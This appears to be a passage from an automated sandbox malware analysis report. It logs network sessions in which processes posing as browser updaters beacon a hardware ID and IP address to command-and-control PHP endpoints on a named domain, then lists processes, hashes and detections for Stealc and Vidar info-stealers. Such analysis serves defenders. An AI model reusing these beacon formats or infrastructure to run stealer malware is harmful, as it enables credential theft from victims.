                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xLMxZwUAXsr6FylUjpWdTv6AYBF6SBXBxm%2By1Bi9BjI%2FZiFvtbgObaE3P1ZLqEB9z64ayVcdM36999EJE7tVBfKqaatYysjxRlQCv0r5SbaVjTez4WxLf9N0Bv8F%2FyZeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb5a2a527ca2-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          145192.168.2.658723172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:18 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:18 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:18 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:46:18 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:18 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35pWZqmiTwBLFTeIHwBf%2BaYwoMO4lj%2F7l8VgTCBEp59DI7YQJQwLKSI0dwA0%2Fb%2BHt%2BjHwmxauAJ2KjImIpf4KBT6gGSTot%2FFB73VW9J9B2STHd0UMlrOptRkzSQFUd3H9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb644b040c7a-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          146192.168.2.658725172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:19 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:19 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:19 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:46:19 UTC637INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:19 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pOZZdQ5TMOukJf2jnMSxp0pZ8ixrD4tx8s7qPcT%2FopZyRMfKDJUmRuuIXskZqf4llhEgljr%2FqM28Ysa4CfygxbOGKQ0fO4bWb%2BYTlw0maT7QzohnrumqMyP8IY3UWYSNDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb69ea097277-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          147192.168.2.658728172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:23 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:23 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:23 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:46:23 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:23 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Oj9a9b3OCeODQMR1G7DLNMIpr%2FLDThg7jCNJLA%2Bh2BslJaYVDUgodi5fPIoDubuOH2ApcO%2F%2FVgHO1fKPaZSjbVGajTLCJxT0jpvXenTv6BMKnJFn4PohMKBPTXE2%2F6GOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb832c981851-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          148192.168.2.658731172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:24 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:24 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:24 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:46:25 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:25 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5wQL8TsAOsI4IryFvUvsj7I%2FH7dMgH0nNTeHw9qHiTvjikotIg%2FlE2ZgcXV7WXGJB0sThddnb1iElj9CtN%2B%2FLIav5QpV%2FvHR45rCwkx32EQTvEnsvHk9ToF4XKYeDepLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb8ceb020cc0-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          149192.168.2.658732172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:25 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:25 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:25 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:46:25 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:25 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JzMc%2BsoGTrOkOftYfjm3BGChk9LOZjooXsmNJqPyeYkkFedFygWehI13xpFBCg62dSwXgnGJ53uHkMZlnm1eYOyE0FW8eKMZTzavXj5%2FrMZB5tWz6WAYjYFpjtdto6eeqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb8fac56438e-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:08:42:41
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                          Imagebase:0xb10000
                                                                                                                                                                                                                                          File size:153'088 bytes
                                                                                                                                                                                                                                          MD5 hash:CA9BAE7D8FA56F97BB596D225E1469C3
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                          Start time:08:42:42
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
                                                                                                                                                                                                                                          Imagebase:0xe00000
                                                                                                                                                                                                                                          File size:153'088 bytes
                                                                                                                                                                                                                                          MD5 hash:CA9BAE7D8FA56F97BB596D225E1469C3
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 37%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:08:42:44
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker
                                                                                                                                                                                                                                          Imagebase:0x760000
                                                                                                                                                                                                                                          File size:153'088 bytes
                                                                                                                                                                                                                                          MD5 hash:CA9BAE7D8FA56F97BB596D225E1469C3
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 37%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                          Start time:08:42:49
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe"
                                                                                                                                                                                                                                          Imagebase:0x650000
                                                                                                                                                                                                                                          File size:1'964'072 bytes
                                                                                                                                                                                                                                          MD5 hash:34EC7A5A9154386680A400B65CADA6CB
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 62%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                          Start time:08:42:49
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:08:42:52
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0xf80000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:08:42:54
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
                                                                                                                                                                                                                                          Imagebase:0xba0000
                                                                                                                                                                                                                                          File size:153'088 bytes
                                                                                                                                                                                                                                          MD5 hash:CA9BAE7D8FA56F97BB596D225E1469C3
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                          Start time:08:42:56
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 12268
                                                                                                                                                                                                                                          Imagebase:0xda0000
                                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                          Start time:08:43:01
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe
                                                                                                                                                                                                                                          Imagebase:0xe30000
                                                                                                                                                                                                                                          File size:344'992 bytes
                                                                                                                                                                                                                                          MD5 hash:022CC85ED0F56A3F3E8AEC4AE3B80A71
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000D.00000002.2333416997.0000000004115000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 55%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                          Start time:08:43:01
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                          Start time:08:43:01
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe
                                                                                                                                                                                                                                          Imagebase:0x5c0000
                                                                                                                                                                                                                                          File size:423'840 bytes
                                                                                                                                                                                                                                          MD5 hash:237AF39F8B579AAD0205F6174BB96239
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 61%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                          Start time:08:43:01
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                          Start time:08:43:02
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0x220000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                          Start time:08:43:02
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
                                                                                                                                                                                                                                          Imagebase:0xb40000
                                                                                                                                                                                                                                          File size:153'088 bytes
                                                                                                                                                                                                                                          MD5 hash:CA9BAE7D8FA56F97BB596D225E1469C3
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                          Start time:08:43:03
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0xf70000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000002.2779012779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000002.2783474686.000000000147A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                          Start time:08:43:03
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0xff0000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

